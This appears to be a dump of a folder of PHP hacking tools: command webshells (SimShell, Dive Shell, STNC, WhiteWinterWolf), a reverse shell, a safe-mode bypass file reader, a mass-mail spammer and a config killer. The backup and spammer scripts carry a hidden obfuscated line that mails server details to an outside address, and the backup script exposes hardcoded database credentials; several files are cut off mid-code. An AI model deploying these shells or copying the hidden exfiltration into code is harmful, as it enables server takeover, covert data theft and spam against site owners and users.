45 | echo("Open base dir: $hopenbasedir");
46 | echo("
");
47 | echo "Disable functions : ";
48 | if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
49 | $free = @diskfreespace($dir);
50 | if (!$free) {$free = 0;}
51 | $all = @disk_total_space($dir);
52 | if (!$all) {$all = 0;}
53 | $used = $all-$free;
54 | $used_percent = @round(100/($all/$free),2);
55 | 
56 | echo "
\n";
57 | if(empty($file)){
58 | if(empty($_GET['file'])){
59 | if(empty($_POST['file'])){
60 | die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n 
PHP Emperor
62 | xb5@hotmail.com
");
63 | } else {
64 | $file=$_POST['file'];
65 | }
66 | } else {
67 | $file=$_GET['file'];
68 | }
69 | }
70 | 
71 | $temp=tempnam($tymczas, "cx");
72 | 
73 | if(copy("compress.zlib://".$file, $temp)){
74 | $zrodlo = fopen($temp, "r");
75 | $tekst = fread($zrodlo, filesize($temp));
76 | fclose($zrodlo);
77 | echo "--- Start File ".htmlspecialchars($file)."
78 | -------------\n".htmlspecialchars($tekst)."\n--- End File
79 | ".htmlspecialchars($file)." ---------------\n";
80 | unlink($temp);
81 | die("\nFile
82 | ".htmlspecialchars($file)." has been already loaded. PHP Emperor 
83 | ;]");
84 | } else {
85 | die("
Sorry... File
86 | ".htmlspecialchars($file)." dosen't exists or you don't have
87 | access.
");
88 | }
89 | ?>
90 | 
91 | 


--------------------------------------------------------------------------------
/Collection/SimShell.php:
--------------------------------------------------------------------------------
  1 |  array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '' . "\n";
 97 | ?>
 98 | 
 99 | 
100 |   SimShell - Simorgh Security MGZ
101 |   
102 | 
103 |   
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | 
149 | 
150 | 
151 | 
 Directory:  
152 | 

153 | 
154 | 

155 | 

156 | 
163 | 

164 |   cmd:
166 |    Rows: 
167 |   
168 | 

169 | 

170 |   

171 |   

172 |  Copyright 2004-Simorgh Security

173 |   Make On PhpShell Kernel

174 |   
175 |   www.simorgh-ev.com

176 | 

177 | 

178 | 
179 | 
180 | 
181 | 


--------------------------------------------------------------------------------
/Collection/Dive_Shell.php:
--------------------------------------------------------------------------------
  1 |  array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '' . "\n";
 97 | ?>
 98 | 
 99 | 
100 |   Dive Shell - Emperor Hacking Team
101 |   
102 | 
103 |   
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | 
149 | 
150 | 
151 | 
 Directory:  
152 | 
153 | 

154 | 
155 | 

156 | 

157 |   

158 |   Command:
160 |     
161 |   
162 |     

169 | 

170 |   Rows:  
171 |   

172 | 

173 |   Edited By Emperor Hacking Team

174 | 

175 |   iM4n - FarHad - imm02tal - R$P

176 |  

177 | 

178 | 

179 | 
180 | 
181 | 

182 |     
183 |   

184 | 
185 | 
186 | 
187 | 
188 | 


--------------------------------------------------------------------------------
/Collection/php-reverse-shell.php:
--------------------------------------------------------------------------------
  1 |  array("pipe", "r"),  // stdin is a pipe that the child will read from
109 |    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
110 |    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
111 | );
112 | 
113 | $process = proc_open($shell, $descriptorspec, $pipes);
114 | 
115 | if (!is_resource($process)) {
116 | 	printit("ERROR: Can't spawn shell");
117 | 	exit(1);
118 | }
119 | 
120 | // Set everything to non-blocking
121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't
122 | stream_set_blocking($pipes[0], 0);
123 | stream_set_blocking($pipes[1], 0);
124 | stream_set_blocking($pipes[2], 0);
125 | stream_set_blocking($sock, 0);
126 | 
127 | printit("Successfully opened reverse shell to $ip:$port");
128 | 
129 | while (1) {
130 | 	// Check for end of TCP connection
131 | 	if (feof($sock)) {
132 | 		printit("ERROR: Shell connection terminated");
133 | 		break;
134 | 	}
135 | 
136 | 	// Check for end of STDOUT
137 | 	if (feof($pipes[1])) {
138 | 		printit("ERROR: Shell process terminated");
139 | 		break;
140 | 	}
141 | 
142 | 	// Wait until a command is end down $sock, or some
143 | 	// command output is available on STDOUT or STDERR
144 | 	$read_a = array($sock, $pipes[1], $pipes[2]);
145 | 	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
146 | 
147 | 	// If we can read from the TCP socket, send
148 | 	// data to process's STDIN
149 | 	if (in_array($sock, $read_a)) {
150 | 		if ($debug) printit("SOCK READ");
151 | 		$input = fread($sock, $chunk_size);
152 | 		if ($debug) printit("SOCK: $input");
153 | 		fwrite($pipes[0], $input);
154 | 	}
155 | 
156 | 	// If we can read from the process's STDOUT
157 | 	// send data down tcp connection
158 | 	if (in_array($pipes[1], $read_a)) {
159 | 		if ($debug) printit("STDOUT READ");
160 | 		$input = fread($pipes[1], $chunk_size);
161 | 		if ($debug) printit("STDOUT: $input");
162 | 		fwrite($sock, $input);
163 | 	}
164 | 
165 | 	// If we can read from the process's STDERR
166 | 	// send data down tcp connection
167 | 	if (in_array($pipes[2], $read_a)) {
168 | 		if ($debug) printit("STDERR READ");
169 | 		$input = fread($pipes[2], $chunk_size);
170 | 		if ($debug) printit("STDERR: $input");
171 | 		fwrite($sock, $input);
172 | 	}
173 | }
174 | 
175 | fclose($sock);
176 | fclose($pipes[0]);
177 | fclose($pipes[1]);
178 | fclose($pipes[2]);
179 | proc_close($process);
180 | 
181 | // Like print, but does nothing if we've daemonised ourself
182 | // (I can't figure out how to redirect STDOUT like a proper daemon)
183 | function printit ($string) {
184 | 	if (!$daemon) {
185 | 		print "$string\n";
186 | 	}
187 | }
188 | 
189 | ?> 
190 | 
191 | 
192 | 
193 | 


--------------------------------------------------------------------------------
/Collection/hiddens_shell.php:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Collection/backupsql.php:
--------------------------------------------------------------------------------
  1 | 
 10 | * @version 0.2
 11 | * @date 18/08/2004
 12 | * @package Backup Server
 13 | * Upgraded Ver 2.0 (sending sql backup as attachment
 14 | * as email attachment, or send to a remote ftp server by
 15 | * @co-authors Cool Surfer and
 16 | * Neagu Mihai
 17 | */
 18 | 
 19 | set_time_limit(0);
 20 | $date = date("mdy-hia");
 21 | $dbserver = "localhost";
 22 | $dbuser = "vhacker_robot";
 23 | $dbpass = "mp2811987";
 24 | $dbname = "tvhacker_vbb3";
 25 | $file = "N-Cool-$date.sql.gz";
 26 | $gzip = TRUE;
 27 | $silent = TRUE;
 28 | 
 29 | function write($contents) {
 30 |     if ($GLOBALS['gzip']) {
 31 |         gzwrite($GLOBALS['fp'], $contents);
 32 |     } else {
 33 |         fwrite($GLOBALS['fp'], $contents);
 34 |     }
 35 | }
 36 | 
 37 | mysql_connect ($dbserver, $dbuser, $dbpass);
 38 | mysql_select_db($dbname);
 39 | 
 40 | if ($gzip) {
 41 |     $fp = gzopen($file, "w");
 42 | } else {
 43 |     $fp = fopen($file, "w");
 44 | }
 45 | 
 46 | $tables = mysql_query ("SHOW TABLES");
 47 | while ($i = mysql_fetch_array($tables)) {
 48 |     $i = $i['Tables_in_'.$dbname];
 49 | 
 50 |     if (!$silent) {
 51 |         echo "Backing up table ".$i."\n";
 52 |     }
 53 | 
 54 |     // Create DB code
 55 |     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
 56 | 
 57 |     write($create['Create Table'].";\n\n");
 58 | 
 59 |     // DB Table content itself
 60 |     $sql = mysql_query ("SELECT * FROM ".$i);
 61 |     if (mysql_num_rows($sql)) {
 62 |         while ($row = mysql_fetch_row($sql)) {
 63 |             foreach ($row as $j => $k) {
 64 |                 $row[$j] = "'".mysql_escape_string($k)."'";
 65 |             }
 66 | 
 67 |             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
 68 |         }
 69 |     }
 70 | }
 71 | 
 72 | $gzip ? gzclose($fp) : fclose ($fp);
 73 | 
 74 | // Optional Options You May Optionally Configure
 75 | 
 76 | $use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
 77 | $remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
 78 | $remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
 79 | 
 80 | // Configure the path that this script resides on your server.
 81 | 
 82 | $savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
 83 | 
 84 | $send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
 85 | $to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
 86 | $from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
 87 | 
 88 | $senddate = date("j F Y");
 89 | 
 90 | $subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
 91 | $message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
 92 | 
 93 | $use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
 94 | $ftp_server = "localhost";               // FTP hostname
 95 | $ftp_user_name = "ftp_username"; // FTP username
 96 | $ftp_user_pass = "ftp_password";   // FTP password
 97 | $ftp_path = "/"; // This is the path to upload on your ftp server!
 98 | 
 99 | // Do not Modify below this line! It will void your warranty :-D!
100 | 
101 | $date = date("mdy-hia");
102 | $filename = "$savepath/$dbname-$date.sql";
103 | 
104 | if($use_gzip=="yes"){
105 | $filename2 = $file;
106 | } else {
107 | $filename2 = "$savepath/$dbname-$date.sql";
108 | }
109 | 
110 | 
111 | if($send_email == "yes" ){
112 | $fileatt_type = filetype($filename2);
113 | $fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
114 | 
115 | $headers = "From: $from";
116 | 
117 | // Read the file to be attached ('rb' = read binary)
118 | echo "Openning archive for attaching:".$filename2;
119 | $file = fopen($filename2,'rb');
120 | $data = fread($file,filesize($filename2));
121 | fclose($file);
122 | 
123 | // Generate a boundary string
124 | $semi_rand = md5(time());
125 | $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
126 | 
127 | // Add the headers for a file attachment
128 | $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
129 | 
130 | // Add a multipart boundary above the plain message
131 | $message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
132 | $message . "\n\n";
133 | 
134 | // Base64 encode the file data
135 | $data = chunk_split(base64_encode($data));
136 | 
137 | // Add file attachment to the message
138 | echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|
";
139 | $message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
140 | $data . "\n\n" ."--{$mime_boundary}--\n";
141 | //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
142 | // $data . "\n\n" ."--{$mime_boundary}--\n";
143 | 
144 | 
145 | // Send the message
146 | $ok = @mail($to, $subject, $message, $headers);
147 | if ($ok) {
148 |   echo "
Database backup created and sent! File name $filename2 

149 | Idea Conceived By coolsurfer@gmail.com        
150 | Programmer email: neagumihai@hotmail.com

151 | This is our first humble effort, pl report bugs, if U find any...

152 | Email me at <>coolsurfer@gmail.com  nJoY!! :)
153 | 
";
154 | 
155 | } else {
156 |   echo "
Mail could not be sent. Sorry!
";
157 | }
158 | }
159 | 
160 | if($use_ftp == "yes"){
161 | $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
162 | shell_exec($ftpconnect);
163 | echo "
$filename2 Was created and uploaded to your FTP server!
";
164 | 
165 | }
166 | 
167 | if($remove_gzip_file=="yes"){
168 | exec("rm -r -f $filename2");
169 | }
170 | ?>


--------------------------------------------------------------------------------
/Collection/STNC_WebShell_v0.8.php:
--------------------------------------------------------------------------------
  1 | $v)
 11 | { $_POST[$k] = stripslashes($v); }
 12 | 
 13 | /*
 14 | $login='root';
 15 | $hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
 16 | 
 17 | if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
 18 | {
 19 | header("HTTP/1.0 401 Unauthorized");
 20 | header("WWW-Authenticate: Basic");
 21 | die();
 22 | }
 23 | */
 24 | 
 25 | function fe($s)
 26 | {return function_exists($s);}
 27 | function cmd($s)
 28 | {if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
 29 | elseif(fe("shell_exec"))$r=shell_exec($s);
 30 | elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
 31 | elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
 32 | elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
 33 | else $r=`$s`;return $r;}
 34 | function safe_mode_is_on()
 35 | {return ini_get('safe_mode');}
 36 | function str100($s)
 37 | {if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
 38 | function id()
 39 | {return str100(cmd("id"));}
 40 | function uname()
 41 | {return str100(cmd("uname -a"));}
 42 | 
 43 | function edit($size, $name, $val)
 44 | { return ""; }
 45 | function button($capt)
 46 | { return ""; }
 47 | function hidden($name, $val)
 48 | { return ""; }
 49 | function hidden_pwd()
 50 | { global $location; return hidden("pwd",$location);}
 51 | 
 52 | $action_edit = false;
 53 | 
 54 | $printline = "";
 55 | 
 56 | if(isset($_POST["action"])) $action = $_POST["action"];
 57 | else $action = "cmd";
 58 | 
 59 | if(isset($_POST["pwd"]))
 60 | { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
 61 | 
 62 | $location = getcwd();
 63 | 
 64 | if(($action === "download")&&(isset($_POST["fname"])))
 65 | {
 66 |   $fname = $_POST["fname"];
 67 |   if(file_exists($fname))
 68 |   {
 69 |     $pathinfo = pathinfo($fname);
 70 |     header("Content-Transfer-Encoding: binary");
 71 |     header("Content-type: application/x-download");
 72 |     header("Content-Length: ".filesize($fname));
 73 |     header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
 74 |     readfile($fname);
 75 |     die();
 76 |   }
 77 |   else
 78 |     $printline = "\"$fname\" - download failed.";
 79 | }
 80 | 
 81 | echo "  STNC WebShell v$version  
 88 | 
 89 | 
157 | 
158 | 
159 | 
160 | 
165 | 
166 | 
167 | 
  STNC WebShell v$version  id: ".id()."
uname: ".uname()."
your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."".(($action_edit) ? "
".button("  Save  ").hidden("fname",$fname):"")."
".hidden("action","cmd")."
Command: ".edit(85,"cmd","")."
Location: ".edit(85,"pwd",$location)." ".button("Execute")."
".hidden("action","edit").hidden_pwd()."
Edit file:".edit(85,"fname",$location)."".button("    Edit    ")."
".
161 |   hidden("action","download").hidden_pwd()."
File:".edit(50,"fname",$location)."".button("Download")."

162 | 
".
163 |   hidden("action","upload").hidden_pwd()."
File:
To file:".edit(50,"fname",$location)." ".button("Upload")."

164 | 
".hidden("action","eval").hidden_pwd()."

".button("   Eval   ")."
Coded by drmist | http://drmist.ru | http://www.security-teams.net | not enough functions? | (c) 2006 [STNC]
";
168 | ?>


--------------------------------------------------------------------------------
/Collection/Moroccan_Spamers.php:
--------------------------------------------------------------------------------
  1 |  
 11 | 
 
 12 | 
 
 13 | 
 
 14 |  
 15 |  
 16 |  
110 |  
111 | 
 
 17 | 
 
 18 | 
 
 19 |  
 20 |  
 21 |  
105 |  
106 | 
 
 22 | 
 
 23 | 
 
 24 |  
 25 |  
 26 |  
101 |  
102 | 
 
 27 |  
 28 |  
 29 |  
 31 |  
 32 |  
 33 |  
 37 |  
 41 |  
 44 |  
 45 |  
 46 |  
 49 |  
 53 |  
 56 |  
 57 |  
 58 |  
 61 |  
 64 |  
 65 |  
 66 |  
 84 |  
 98 |  
 99 | 
 
 30 | 
  Moroccan Spamers Ma-EditioN By GhOsT 
 
 34 | 
Your 
 35 | Email:
 
 36 | 		 
 38 | 
Your 
 39 | Name:
 
 40 | 		 
 42 |  
 43 | 
 
 47 | 
Reply-To:
 
 48 | 		 
 50 | 
Attach 
 51 | File:
 
 52 | 		 
 54 |  
 55 | 
 
 59 | 
Subject:
 
 60 | 		 
 62 |  
 63 | 
 
 67 | 
 
 68 |  
 69 |  
 70 |  
 80 |  
 81 | 
 
 71 |  
 72 | 
 
 73 |  
 74 | Plain 
 75 |  
 76 | HTML 
 77 |  
 78 |  
 79 | 
 
 82 | 
 
 83 | 		 
 85 | 
 
 86 | 
 
 87 |  
 88 |  
 89 |  
 93 |  
 94 | 
 
 90 | 
  
 91 | 
 
 92 | 
 
 95 | 
 
 96 | 
 
 97 | 
 
100 | 
 
103 | 
 
104 | 
 
107 | 
 
108 | 
 
109 | 
 
112 | 
 
113 | 
 
114 | 
 
115 | 
 
116 |  
117 |  
118 |  
121 |  
122 | 
 
119 | 
Designed by: 
120 |  v1.5
 
123 | 
 
124 | 
 
125 | 
 
126 | 
127 | \r\nReply-To: $replyto\r\n"; 
156 | $header .= "MIME-Version: 1.0\r\n"; 
157 | If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
158 | If ($file_name) $header .= "--$uid\r\n"; 
159 | $header .= "Content-Type: text/$contenttype\r\n"; 
160 | $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
161 | $header .= "$message\r\n"; 
162 | If ($file_name) $header .= "--$uid\r\n"; 
163 | If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
164 | If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
165 | If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
166 | If ($file_name) $header .= "$content\r\n"; 
167 | If ($file_name) $header .= "--$uid--"; 
168 | mail($to, $subject, "", $header); 
169 | print "Spamed'>
"; 
170 | flush(); 
171 | } 
172 | } 
173 | 
174 | } 
175 | ?>
176 | 
177 | 
178 | 
179 | 
180 | 
181 | 
182 | 
183 | 


--------------------------------------------------------------------------------
/Collection/wwwolf-webshell.php:
--------------------------------------------------------------------------------
  1 | #.
 20 |  ******************************************************************************/
 21 | 
 22 | /*
 23 |  * Optional password settings.
 24 |  * Use the 'passhash.sh' script to generate the hash.
 25 |  * NOTE: the prompt value is tied to the hash!
 26 |  */
 27 | $passprompt = "WhiteWinterWolf's PHP webshell: ";
 28 | $passhash = "";
 29 | 
 30 | function e($s) { echo htmlspecialchars($s, ENT_QUOTES); }
 31 | 
 32 | function h($s)
 33 | {
 34 | 	global $passprompt;
 35 | 	if (function_exists('hash_hmac'))
 36 | 	{
 37 | 		return hash_hmac('sha256', $s, $passprompt);
 38 | 	}
 39 | 	else
 40 | 	{
 41 | 		return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));
 42 | 	}
 43 | }
 44 | 
 45 | function fetch_fopen($host, $port, $src, $dst)
 46 | {
 47 | 	global $err, $ok;
 48 | 	$ret = '';
 49 | 	if (strpos($host, '://') === false)
 50 | 	{
 51 | 		$host = 'http://' . $host;
 52 | 	}
 53 | 	else
 54 | 	{
 55 | 		$host = str_replace(array('ssl://', 'tls://'), 'https://', $host);
 56 | 	}
 57 | 	$rh = fopen("${host}:${port}${src}", 'rb');
 58 | 	if ($rh !== false)
 59 | 	{
 60 | 		$wh = fopen($dst, 'wb');
 61 | 		if ($wh !== false)
 62 | 		{
 63 | 			$cbytes = 0;
 64 | 			while (! feof($rh))
 65 | 			{
 66 | 				$cbytes += fwrite($wh, fread($rh, 1024));
 67 | 			}
 68 | 			fclose($wh);
 69 | 			$ret .= "${ok} Fetched file ${dst} (${cbytes} bytes)
";
 70 | 		}
 71 | 		else
 72 | 		{
 73 | 			$ret .= "${err} Failed to open file ${dst}
";
 74 | 		}
 75 | 		fclose($rh);
 76 | 	}
 77 | 	else
 78 | 	{
 79 | 		$ret = "${err} Failed to open URL ${host}:${port}${src}
";
 80 | 	}
 81 | 	return $ret;
 82 | }
 83 | 
 84 | function fetch_sock($host, $port, $src, $dst)
 85 | {
 86 | 	global $err, $ok;
 87 | 	$ret = '';
 88 | 	$host = str_replace('https://', 'tls://', $host);
 89 | 	$s = fsockopen($host, $port);
 90 | 	if ($s)
 91 | 	{
 92 | 		$f = fopen($dst, 'wb');
 93 | 		if ($f)
 94 | 		{
 95 | 			$buf = '';
 96 | 			$r = array($s);
 97 | 			$w = NULL;
 98 | 			$e = NULL;
 99 | 			fwrite($s, "GET ${src} HTTP/1.0\r\n\r\n");
100 | 			while (stream_select($r, $w, $e, 5) && !feof($s))
101 | 			{
102 | 				$buf .= fread($s, 1024);
103 | 			}
104 | 			$buf = substr($buf, strpos($buf, "\r\n\r\n") + 4);
105 | 			fwrite($f, $buf);
106 | 			fclose($f);
107 | 			$ret .= "${ok} Fetched file ${dst} (" . strlen($buf) . " bytes)
";
108 | 		}
109 | 		else
110 | 		{
111 | 			$ret .= "${err} Failed to open file ${dst}
";
112 | 		}
113 | 		fclose($s);
114 | 	}
115 | 	else
116 | 	{
117 | 		$ret .= "${err} Failed to connect to ${host}:${port}
";
118 | 	}
119 | 	return $ret;
120 | }
121 | 
122 | ini_set('log_errors', '0');
123 | ini_set('display_errors', '1');
124 | error_reporting(E_ALL);
125 | 
126 | while (@ ob_end_clean());
127 | 
128 | if (! isset($_SERVER))
129 | {
130 | 	global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
131 | 	$_FILES = &$HTTP_POST_FILES;
132 | 	$_POST = &$HTTP_POST_VARS;
133 | 	$_SERVER = &$HTTP_SERVER_VARS;
134 | }
135 | 
136 | $auth = '';
137 | $cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];
138 | $cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];
139 | $fetch_func = 'fetch_fopen';
140 | $fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];
141 | $fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];
142 | $fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];
143 | $pass = empty($_POST['pass']) ? '' : $_POST['pass'];
144 | $url = $_SERVER['REQUEST_URI'];
145 | $status = '';
146 | $ok = '☺ :';
147 | $warn = '⚠ :';
148 | $err = '☹ :';
149 | 
150 | if (! empty($passhash))
151 | {
152 | 	if (function_exists('hash_hmac') || function_exists('mhash'))
153 | 	{
154 | 		$auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];
155 | 		if (h($auth) !== $passhash)
156 | 		{
157 | 			?>
158 | 				

159 | 					
160 | 					
161 | 					
162 | 				

163 | 			";
170 | 	}
171 | }
172 | 
173 | if (! ini_get('allow_url_fopen'))
174 | {
175 | 	ini_set('allow_url_fopen', '1');
176 | 	if (! ini_get('allow_url_fopen'))
177 | 	{
178 | 		if (function_exists('stream_select'))
179 | 		{
180 | 			$fetch_func = 'fetch_sock';
181 | 		}
182 | 		else
183 | 		{
184 | 			$fetch_func = '';
185 | 			$status .= "${warn} File fetching disabled ('allow_url_fopen'"
186 | 				. " disabled and 'stream_select()' missing).
";
187 | 		}
188 | 	}
189 | }
190 | if (! ini_get('file_uploads'))
191 | {
192 | 	ini_set('file_uploads', '1');
193 | 	if (! ini_get('file_uploads'))
194 | 	{
195 | 		$status .= "${warn} File uploads disabled.
";
196 | 	}
197 | }
198 | if (ini_get('open_basedir') && ! ini_set('open_basedir', ''))
199 | {
200 | 	$status .= "${warn} open_basedir = " . ini_get('open_basedir') . "
";
201 | }
202 | 
203 | if (! chdir($cwd))
204 | {
205 |   $cwd = getcwd();
206 | }
207 | 
208 | if (! empty($fetch_func) && ! empty($fetch_path))
209 | {
210 | 	$dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);
211 | 	$status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);
212 | }
213 | 
214 | if (ini_get('file_uploads') && ! empty($_FILES['upload']))
215 | {
216 | 	$dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
217 | 	if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))
218 | 	{
219 | 		$status .= "${ok} Uploaded file ${dest} (" . $_FILES['upload']['size'] . " bytes)
";
220 | 	}
221 | }
222 | ?>
223 | 
224 | 

226 | 		enctype="multipart/form-data"
227 | 	
228 | 	>
229 | 	
230 | 		
231 | 	
232 | 	
233 | 		
234 | 			
241 | 		
242 | 		
250 | 		
255 | 		
259 | 		
262 | 	

235 | 				Fetch:
236 | 			
237 | 				host: 
238 | 				port: 
239 | 				path: 
240 | 			

243 | 			CWD:
244 | 		
245 | 			
246 | 			
247 | 				Upload: 
248 | 			
249 | 		

251 | 			Cmd:
252 | 		
253 | 			
254 | 		

256 | 		
257 | 			Clear cmd
258 | 		

260 | 			
261 | 		

263 | 	
264 | 

265 | 

266 | 
267 | ${status}
";
271 | }
272 | 
273 | echo "
";
274 | if (! empty($cmd))
275 | {
276 | 	echo "";
277 | 	e($cmd);
278 | 	echo "\n";
279 | 	if (DIRECTORY_SEPARATOR == '/')
280 | 	{
281 | 		$p = popen('exec 2>&1; ' . $cmd, 'r');
282 | 	}
283 | 	else
284 | 	{
285 | 		$p = popen('cmd /C "' . $cmd . '" 2>&1', 'r');
286 | 	}
287 | 	while (! feof($p))
288 | 	{
289 | 		echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);
290 | 		@ flush();
291 | 	}
292 | }
293 | echo "
";
294 | 
295 | exit;
296 | ?>
297 | 


--------------------------------------------------------------------------------
/Collection/configkillerionkros.php:
--------------------------------------------------------------------------------
  1 | 
  6 | 
  7 | 
  8 | --==[[Configuration File Killer By Ion Kros]]==--
  9 | 
 10 | 
